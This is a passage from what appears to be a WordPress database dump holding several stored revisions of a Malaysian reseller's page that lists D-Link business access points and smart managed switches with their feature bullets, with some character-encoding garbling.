automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Support IEEE 802.3af (PoE) and 802.3at (PoE+) Â with Power Budget of 370W</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>','D-Link','','inherit','closed','closed','','1480-revision-v1','','','2019-09-25 14:56:42','2019-09-25 06:56:42','',1480,'https://bintara.com.my/blog/2019/09/25/1480-revision-v1/',0,'revision','',0),(3415,1,'2019-09-25 15:00:31','2019-09-25 07:00:31','<h2>D - Link Business Solution Product </h2>		\n			<h3>Business Wireless</h3>		\n			<h4>AC1750 Wave 2 Dualâ€‘Band WI-FI PoE Access Pointâ€‹</h4>		\n										<img width=\"300\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png 500w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<p>Â 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>MU-MIMO with beamforming</p><p>Band steering</p><p>Gigabit PoE-capable LAN port</p><p>AP Array utility support</p><p>Free D-Link Central WiFiManager</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>2.4GHz Wireless N300 Outdoor Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through</p><p>Two 10/100 Ethernet ports (one supporting PoE) allow for further physical expansion</p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage</p><p>Weather-proof design (IPX6) built to withstand harsh environments</p><p>Supports multiple operation modes â€“ AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater</p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic</p><p>Provides WLAN partitioning for deployments such as wireless hot spots</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>AC1750 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png 255w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards</p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 MbpsÂ  Over 5 GHz band</p><p>Support load balancing to ensure maximum performance by limiting userÂ  per AP</p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications</p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHzÂ  or 5 GHz band</p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet</p><p>Support multiple operation â€“ AP, WDS with AP, WDS/Bridge and Client</p><p>RuggedÂ  metal housing &amp;Â  Plenum-rated chassis</p><p>Built in Radius ServerÂ  allowing users to create their accounts within the device itself.</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>N600 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png 255w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		802.11ac Wave 2 wireless, up to 1.75 Gbps\nMU-MIMO with beamforming\nBand steering\nGigabit PoE-capable LAN port\nAP Array utility support\nFree D-Link Central WiFiManager<center>[maxbutton id=\"6\" ]</center>		\n			<h4>AC1300 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<h4 style=\"text-align: center;\">Enjoy High-performance Wireless Connectivity</h4><p style=\"text-align: left;\">Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications</p><h4 style=\"text-align: center;\">MU-MIMO with Beamforming</h4><p>Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network</p><h4 style=\"text-align: center;\">Multiple Operational Modes</h4><p>Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>N300 Wireless PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>High-speed wireless performance with 300 Mbps wireless signal rates</p><p>Support Wi-fi Multimediaâ„¢ (WMM) for audio, video, and voice applications</p><p>Gigabit Ethernet port with 802.3af Power over EthernetMultiple operation modes: AP, WDS with AP, WDS/Bridgeanf Client</p><p>Support Inbuilt Radius server, Network Access protection (NAP)</p><p>Equipped with 8 VLANs per band for multiple SSIDsÂ  Implementation</p><p>Support Central WiFi Manager to configure and manage multiple AP</p><center>[maxbutton id=\"6\" ]</center>		\n			<h3>Smart Switch</h3>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T/SFP+ Combo Slots</p><p>Suitable for virtualization, cloud services and server-to-server applications</p><p>D-link Green Technology conserves energy by powering down unused ports</p><p>Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.</p><p>Support G.8032 ERPS to achieve high reliability and network stability</p><p>802.1X port based authentication, for authentication through external RADIUS servers</p><p>Support D-Link Network Assistant Utility to simplifies the configuration</p><p>Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]</p>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G SFP+, Two 10 Gigabit Base-T /SFP+ Combo Ports<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>26-Port Layer 2 Lite Smart Managed Gigabit Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Port 10/100/1000 Base-T with 2 Gigabit SFP Ports<br />â€¢ Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>10 Gigabit Ethernet Smart Managed Switches</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>10 Gigabit Ethernet Connection</p><p>Improved Power Efficiency</p><p>Smart and Flexible Management</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 2 Smart Managed Gigabit PoE Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T PoE + 4 slots for Gigabit SFP<br />â€¢ Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br />â€¢ Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Access Control List (ACL) feature to enhances network security<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Built-in SNMP MIB for remote NetworkÂ Management Systems</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Support IEEE 802.3af (PoE) and 802.3at (PoE+) Â with Power Budget of 370W</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>','D-Link','','inherit','closed','closed','','1480-revision-v1','','','2019-09-25 15:00:31','2019-09-25 07:00:31','',1480,'https://bintara.com.my/blog/2019/09/25/1480-revision-v1/',0,'revision','',0),(3417,1,'2019-09-25 15:09:42','2019-09-25 07:09:42','<h2>D - Link Business Solution Product </h2>		\n			<h3>Business Wireless</h3>		\n			<h4>AC1750 Wave 2 Dualâ€‘Band WI-FI PoE Access Pointâ€‹</h4>		\n										<img width=\"300\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png 500w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<p>Â 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>MU-MIMO with beamforming</p><p>Band steering</p><p>Gigabit PoE-capable LAN port</p><p>AP Array utility support</p><p>Free D-Link Central WiFiManager</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>2.4GHz Wireless N300 Outdoor Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through</p><p>Two 10/100 Ethernet ports (one supporting PoE) allow for further physical expansion</p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage</p><p>Weather-proof design (IPX6) built to withstand harsh environments</p><p>Supports multiple operation modes â€“ AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater</p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic</p><p>Provides WLAN partitioning for deployments such as wireless hot spots</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>AC1750 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png 255w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards</p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 MbpsÂ  Over 5 GHz band</p><p>Support load balancing to ensure maximum performance by limiting userÂ  per AP</p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications</p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHzÂ  or 5 GHz band</p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet</p><p>Support multiple operation â€“ AP, WDS with AP, WDS/Bridge and Client</p><p>RuggedÂ  metal housing &amp;Â  Plenum-rated chassis</p><p>Built in Radius ServerÂ  allowing users to create their accounts within the device itself.</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>N600 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png 255w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		802.11ac Wave 2 wireless, up to 1.75 Gbps\nMU-MIMO with beamforming\nBand steering\nGigabit PoE-capable LAN port\nAP Array utility support\nFree D-Link Central WiFiManager<center>[maxbutton id=\"6\" ]</center>		\n			<h4>AC1300 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<h4 style=\"text-align: center;\">Enjoy High-performance Wireless Connectivity</h4><p style=\"text-align: left;\">Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications</p><h4 style=\"text-align: center;\">MU-MIMO with Beamforming</h4><p>Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network</p><h4 style=\"text-align: center;\">Multiple Operational Modes</h4><p>Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>N300 Wireless PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>High-speed wireless performance with 300 Mbps wireless signal rates</p><p>Support Wi-fi Multimediaâ„¢ (WMM) for audio, video, and voice applications</p><p>Gigabit Ethernet port with 802.3af Power over EthernetMultiple operation modes: AP, WDS with AP, WDS/Bridgeanf Client</p><p>Support Inbuilt Radius server, Network Access protection (NAP)</p><p>Equipped with 8 VLANs per band for multiple SSIDsÂ  Implementation</p><p>Support Central WiFi Manager to configure and manage multiple AP</p><center>[maxbutton id=\"6\" ]</center>		\n			<h3>Smart Switch</h3>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T/SFP+ Combo Slots</p><p>Suitable for virtualization, cloud services and server-to-server applications</p><p>D-link Green Technology conserves energy by powering down unused ports</p><p>Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.</p><p>Support G.8032 ERPS to achieve high reliability and network stability</p><p>802.1X port based authentication, for authentication through external RADIUS servers</p><p>Support D-Link Network Assistant Utility to simplifies the configuration</p><p>Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>8 Ports 10G SFP+, Two 10 Gigabit Base-T /SFP+ Combo Ports</p><p>Suitable for virtualization, cloud services and server-to-server applications</p><p>D-link Green Technology conserves energy by powering down unused ports</p><p>Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.</p><p>Support G.8032 ERPS to achieve high reliability and network stability</p><p>802.1X port based authentication, for authentication through external RADIUS servers</p><p>Support D-Link Network Assistant Utility to simplifies the configuration</p><p>Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>26-Port Layer 2 Lite Smart Managed Gigabit Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>24 Port 10/100/1000 Base-T with 2 Gigabit SFP Ports</p><p>Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint</p><p>Support IEEE 802.1Q VLAN traffic segregation</p><p>Auto Surveillance VLAN for easy integration with IP-based surveillance systems</p><p>Loopback detection (LBD) and broadcast storm control to avoid network downtime</p><p>Quality of Service (QOS) and bandwidth control to ensure smooth operation</p><p>Cable diagnostics function to help troubleshooting wiring problem</p><p>Support Web-based GUI, Smart Console , Network Assistance Utility</p><p>[maxbutton id=\"6\" ]</p>		\n			<h4>10 Gigabit Ethernet Smart Managed Switches</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>10 Gigabit Ethernet Connection</p><p>Improved Power Efficiency</p><p>Smart and Flexible Management</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 2 Smart Managed Gigabit PoE Switch</h4>		\n										<img width=\"510\" height=\"600\" 